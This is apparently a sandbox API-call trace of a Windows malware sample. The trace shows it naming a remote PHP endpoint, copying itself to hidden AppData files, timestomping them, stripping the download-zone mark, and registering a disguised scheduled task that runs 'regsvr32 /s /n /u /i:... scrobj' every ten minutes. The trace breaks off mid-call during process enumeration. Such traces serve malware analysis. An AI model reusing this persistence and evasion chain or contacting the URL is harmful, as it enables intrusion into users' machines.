[0087.939] wsprintfA (in: param_1=0x2da0218, param_2="%02X" | out: param_1="2B") returned 2 [0087.939] wsprintfA (in: param_1=0x2da021a, param_2="%02X" | out: param_1="96") returned 2 [0087.939] wsprintfA (in: param_1=0x2da021c, param_2="%02X" | out: param_1="B7") returned 2 [0087.939] wsprintfA (in: param_1=0x2da021e, param_2="%02X" | out: param_1="2C") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0220, param_2="%02X" | out: param_1="F2") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0222, param_2="%02X" | out: param_1="C4") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0224, param_2="%02X" | out: param_1="FA") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0226, param_2="%02X" | out: param_1="84") returned 2 [0087.939] wsprintfA (in: param_1=0x2da0228, param_2="%02X" | out: param_1="48") returned 2 [0087.939] wsprintfA (in: param_1=0x2da022a, param_2="%02X" | out: param_1="6C") returned 2 [0087.939] CryptDestroyHash (hHash=0x768d700) returned 1 [0087.939] CryptReleaseContext (hProv=0x2b84910, dwFlags=0x0) returned 1 [0087.939] wsprintfA (in: param_1=0x2da022c, param_2="%08X" | out: param_1="9C354B42") returned 8 [0087.939] GetProcessHeap () returned 0x2a0000 [0087.939] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x48e3530) returned 1 [0087.939] wsprintfA (in: param_1=0x2da0dae, param_2="%s%s" | out: param_1="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 42 [0087.939] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="604954A450752B96B72CF2C4FA84486C9C354B42") returned 0x58c [0087.939] RtlGetLastWin32Error () returned 0x0 [0087.939] GetTickCount () returned 0x114fa08 [0087.939] GetProcessHeap () returned 0x2a0000 [0087.939] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1008) returned 0x497ef50 [0087.940] GetProcessHeap () returned 0x2a0000 [0087.940] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x48e3530 [0087.940] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x696f858 | out: phkResult=0x696f858*=0x588) returned 0x0 [0087.940] GetProcessHeap () returned 0x2a0000 [0087.940] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x14) returned 0x4a9ca40 [0087.940] RegQueryValueExA (in: hKey=0x588, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x696f7e0, lpcbData=0x696f840*=0x20 | out: lpType=0x0, lpData=0x696f7e0*=0x0, lpcbData=0x696f840*=0x20) returned 0x2 [0087.940] GetProcessHeap () returned 0x2a0000 [0087.940] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9ca40) returned 1 [0087.940] GetProcessHeap () returned 0x2a0000 [0087.940] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x11) returned 0x4a9ca40 [0087.940] RegQueryValueExA (in: hKey=0x588, lpValueName="Version", lpReserved=0x0, lpType=0x0, lpData=0x696f7e0, lpcbData=0x696f840*=0x20 | out: lpType=0x0, lpData=0x696f7e0*=0x38, lpcbData=0x696f840*=0xf) returned 0x0 [0087.940] GetProcessHeap () returned 0x2a0000 [0087.940] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9ca40) returned 1 [0087.940] lstrlenA (lpString="8.0.7601.17514") returned 14 [0087.940] lstrlenA (lpString=".") returned 1 [0087.940] atoi (_Str="8") returned 8 [0087.940] RegCloseKey (hKey=0x588) returned 0x0 [0087.940] GetProcessHeap () returned 0x2a0000 [0087.940] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x48e3530) returned 1 [0087.941] ObtainUserAgentString (in: dwOption=0x8, pszUAOut=0x497ef50, cbSize=0x696f840 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", cbSize=0x696f840) returned 0x0 [0087.950] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned 195 [0087.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x497ef50, cbMultiByte=196, lpWideCharStr=0x2da0567, cchWideChar=392 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned 196 [0087.950] GetProcessHeap () returned 0x2a0000 [0087.950] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x497ef50) returned 1 [0087.950] GetProcessHeap () returned 0x2a0000 [0087.950] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1008) returned 0x497ef50 [0087.950] GetProcessHeap () returned 0x2a0000 [0087.950] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1c) returned 0x4a3ef60 [0087.950] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x497ef50, nSize=0x105 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2e [0087.950] GetProcessHeap () returned 0x2a0000 [0087.951] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a3ef60) returned 1 [0087.951] GetProcessHeap () returned 0x2a0000 [0087.951] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x16) returned 0x4a9ca40 [0087.951] wsprintfW (in: param_1=0x2da0796, param_2="%s\\%hs" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned 53 [0087.951] wsprintfW (in: param_1=0x2da099e, param_2="%s\\%hs" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 53 [0087.951] wsprintfW (in: param_1=0x2da0ba6, param_2="%s\\%hs" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer") returned 53 [0087.951] GetProcessHeap () returned 0x2a0000 [0087.951] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9ca40) returned 1 [0087.951] GetProcessHeap () returned 0x2a0000 [0087.951] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x44) returned 0x48f0c50 [0087.951] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0087.951] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x48f0c50, Length=0x3b) returned 0x477da475 [0087.951] GetProcessHeap () returned 0x2a0000 [0087.951] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x48f0c50) returned 1 [0087.951] lstrcmpW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned 1 [0087.951] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0 [0087.951] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jma.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe"), bFailIfExists=0) returned 1 [0087.963] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jma.exe")) returned 1 [0087.966] GetProcessHeap () returned 0x2a0000 [0087.967] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x4a9ca40 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x48e3530 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x408) returned 0x4a88870 [0087.967] wsprintfW (in: param_1=0x4a88870, param_2="%s%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe:Zone.Identifier") returned 69 [0087.967] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe:Zone.Identifier" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe:zone.identifier")) returned 0 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a88870) returned 1 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9ca40) returned 1 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x48e3530) returned 1 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x16) returned 0x4a9ca40 [0087.967] GetProcessHeap () returned 0x2a0000 [0087.967] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x210) returned 0x2be3a60 [0087.967] GetSystemDirectoryA (in: lpBuffer=0x2be3a60, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.967] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0087.967] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0087.967] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe", dwFileAttributes=0x6) returned 1 [0087.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x588 [0087.967] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x696f7b0 | out: lpFileInformation=0x696f7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0087.968] SetFileTime (hFile=0x588, lpCreationTime=0x696f7b4, lpLastAccessTime=0x696f7bc, lpLastWriteTime=0x696f7c4) returned 1 [0087.968] CloseHandle (hObject=0x588) returned 1 [0087.968] GetProcessHeap () returned 0x2a0000 [0087.968] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2be3a60) returned 1 [0087.968] GetProcessHeap () returned 0x2a0000 [0087.968] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9ca40) returned 1 [0087.968] GetProcessHeap () returned 0x2a0000 [0087.968] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4a) returned 0x76ad740 [0087.968] GetProcessHeap () returned 0x2a0000 [0087.968] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x418) returned 0x2b90310 [0087.968] wsprintfW (in: param_1=0x2b90310, param_2="/s /n /u /i:\"%s\" scrobj" | out: param_1="/s /n /u /i:\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw\" scrobj") returned 74 [0087.968] GetProcessHeap () returned 0x2a0000 [0087.968] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x212) returned 0x2be3a60 [0087.968] GetUserNameW (in: lpBuffer=0x2be3a60, pcbBuffer=0x696f7f0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x696f7f0) returned 1 [0087.969] GetProcessHeap () returned 0x2a0000 [0087.969] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x10d) returned 0x4a995e0 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.970] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x72) returned 0x2c07cb0 [0087.970] wsprintfW (in: param_1=0x4a995e0, param_2="NvNgxUpdateCheckDaily_{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}") returned 60 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.970] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2c07cb0) returned 1 [0087.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jgshctw"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.970] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xf5) returned 0x2b84910 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.970] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x10d) returned 0x4a994c0 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.970] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x210) returned 0x2be33d0 [0087.970] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" [0087.970] wsprintfA (in: param_1=0x4a994c0, param_2="" | out: param_1="") returned 285 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.970] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2be33d0) returned 1 [0087.970] GetProcessHeap () returned 0x2a0000 [0087.971] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2b84910) returned 1 [0087.971] WriteFile (in: hFile=0x5c8, lpBuffer=0x4a994c0*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x696f7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a994c0*, lpNumberOfBytesWritten=0x696f7a8*=0x11d, lpOverlapped=0x0) returned 1 [0087.971] CloseHandle (hObject=0x5c8) returned 1 [0087.972] GetProcessHeap () returned 0x2a0000 [0087.972] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a994c0) returned 1 [0087.972] GetProcessHeap () returned 0x2a0000 [0087.972] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x16) returned 0x4a9ca40 [0087.972] GetProcessHeap () returned 0x2a0000 [0087.972] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x210) returned 0x2be33d0 [0087.972] GetSystemDirectoryA (in: lpBuffer=0x2be33d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.972] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0087.972] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0087.972] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw", dwFileAttributes=0x6) returned 1 [0087.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jgshctw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x5c8 [0087.972] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x696f700 | out: lpFileInformation=0x696f700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0087.973] SetFileTime (hFile=0x5c8, lpCreationTime=0x696f704, lpLastAccessTime=0x696f70c, lpLastWriteTime=0x696f714) returned 1 [0087.973] CloseHandle (hObject=0x5c8) returned 1 [0087.973] GetProcessHeap () returned 0x2a0000 [0087.973] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2be33d0) returned 1 [0087.973] GetProcessHeap () returned 0x2a0000 [0087.973] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9ca40) returned 1 [0087.973] CoCreateInstance (in: rclsid=0x4161010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4161000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x696f688 | out: ppv=0x696f688*=0x3c66e0) returned 0x0 [0087.973] TaskScheduler:ITaskService:Connect (This=0x3c66e0, serverName=0x696f6f0*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40), user=0x696f710*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40), domain=0x696f6d0*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40), password=0x696f750*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40)) returned 0x0 [0087.976] TaskScheduler:ITaskService:GetFolder (in: This=0x3c66e0, Path="", ppFolder=0x696f6a8 | out: ppFolder=0x696f6a8*=0x3b5aa0) returned 0x0 [0087.979] ITaskFolder:DeleteTask (This=0x3b5aa0, Name="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}", flags=0) returned 0x80070002 [0087.980] TaskScheduler:ITaskService:NewTask (in: This=0x3c66e0, flags=0x0, ppDefinition=0x696f7a0 | out: ppDefinition=0x696f7a0*=0x3c6790) returned 0x0 [0087.981] ITaskDefinition:get_RegistrationInfo (in: This=0x3c6790, ppRegistrationInfo=0x696f6b0 | out: ppRegistrationInfo=0x696f6b0*=0x3c68d0) returned 0x0 [0087.981] IRegistrationInfo:put_Author (This=0x3c68d0, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0087.981] IUnknown:Release (This=0x3c68d0) returned 0x1 [0087.981] ITaskDefinition:get_Settings (in: This=0x3c6790, ppSettings=0x696f690 | out: ppSettings=0x696f690*=0x3c6990) returned 0x0 [0087.981] ITaskSettings:put_StartWhenAvailable (This=0x3c6990, StartWhenAvailable=1) returned 0x0 [0087.981] IUnknown:Release (This=0x3c6990) returned 0x1 [0087.981] ITaskDefinition:get_Triggers (in: This=0x3c6790, ppTriggers=0x696f698 | out: ppTriggers=0x696f698*=0x18b020) returned 0x0 [0087.981] ITriggerCollection:Create (in: This=0x18b020, Type=1, ppTrigger=0x696f678 | out: ppTrigger=0x696f678*=0x3bc780) returned 0x0 [0087.982] IUnknown:QueryInterface (in: This=0x3bc780, riid=0x4161030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x696f680 | out: ppvObject=0x696f680*=0x3bc780) returned 0x0 [0087.982] ITrigger:get_Repetition (in: This=0x3bc780, ppRepeat=0x696f670 | out: ppRepeat=0x696f670*=0x3bf7c0) returned 0x0 [0087.982] GetProcessHeap () returned 0x2a0000 [0087.982] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x14) returned 0x4a9d2e0 [0087.982] IRepetitionPattern:put_Interval (This=0x3bf7c0, Interval="PT10M") returned 0x0 [0087.983] ITrigger:put_Repetition (This=0x3bc780, Repetition=0x3bf7c0) returned 0x0 [0087.983] IUnknown:Release (This=0x3bf7c0) returned 0x1 [0087.983] GetProcessHeap () returned 0x2a0000 [0087.983] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x48e39b0 [0087.983] ITrigger:put_StartBoundary (This=0x3bc780, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0087.983] IUnknown:Release (This=0x3bc780) returned 0x2 [0087.983] GetProcessHeap () returned 0x2a0000 [0087.983] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x48e39b0) returned 1 [0087.983] GetProcessHeap () returned 0x2a0000 [0087.983] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a9d2e0) returned 1 [0087.983] IUnknown:Release (This=0x3bc780) returned 0x1 [0087.983] ITriggerCollection:Create (in: This=0x18b020, Type=9, ppTrigger=0x696f678 | out: ppTrigger=0x696f678*=0x3bc8a0) returned 0x0 [0087.984] IUnknown:QueryInterface (in: This=0x3bc8a0, riid=0x4161020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x696f670 | out: ppvObject=0x696f670*=0x3bc8a0) returned 0x0 [0087.984] ILogonTrigger:put_UserId (This=0x3bc8a0, UserId="5p5NrGJn0jS HALPmcxz") returned 0x0 [0087.986] IUnknown:Release (This=0x3bc8a0) returned 0x2 [0087.986] IUnknown:Release (This=0x3bc8a0) returned 0x1 [0087.986] ITaskDefinition:get_Actions (in: This=0x3c6790, ppActions=0x696f6b8 | out: ppActions=0x696f6b8*=0x3c6850) returned 0x0 [0087.986] IActionCollection:Create (in: This=0x3c6850, Type=0, ppAction=0x696f6c0 | out: ppAction=0x696f6c0*=0x3c6af0) returned 0x0 [0087.986] IUnknown:Release (This=0x3c6850) returned 0x1 [0087.986] IUnknown:QueryInterface (in: This=0x3c6af0, riid=0x4161040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x696f6a0 | out: ppvObject=0x696f6a0*=0x3c6af0) returned 0x0 [0087.986] IExecAction:put_Path (This=0x3c6af0, Path="regsvr32") returned 0x0 [0087.986] IExecAction:put_Arguments (This=0x3c6af0, Arguments="/s /n /u /i:\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw\" scrobj") returned 0x0 [0087.986] IUnknown:Release (This=0x3c6af0) returned 0x2 [0087.987] ITaskFolder:RegisterTaskDefinition (in: This=0x3b5aa0, Path="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}", pDefinition=0x3c6790, flags=6, UserId=0x696f6d0*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40), password=0x696f710*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40), LogonType=3, sddl=0x696f6f0*(varType=0x0, wReserved1=0x2da, wReserved2=0x0, wReserved3=0x0, varVal1=0x416384f, varVal2=0x4a9ca40), ppTask=0x696f670 | out: ppTask=0x696f670*=0x3c6b60) returned 0x0 [0088.083] IUnknown:Release (This=0x3c6af0) returned 0x1 [0088.083] IUnknown:Release (This=0x18b020) returned 0x1 [0088.083] TaskScheduler:IUnknown:Release (This=0x3c6790) returned 0x0 [0088.083] TaskScheduler:IUnknown:Release (This=0x3b5aa0) returned 0x0 [0088.083] TaskScheduler:IUnknown:Release (This=0x3c66e0) returned 0x0 [0088.083] GetProcessHeap () returned 0x2a0000 [0088.083] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x4a995e0) Thread: id = 44 os_tid = 0xae4 [0071.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaac [0071.636] Process32First (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.636] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0071.637] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0071.637] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.638] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0071.638] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.639] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0071.639] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0071.639] Process32Next (in: hSnapshot=0xaac, 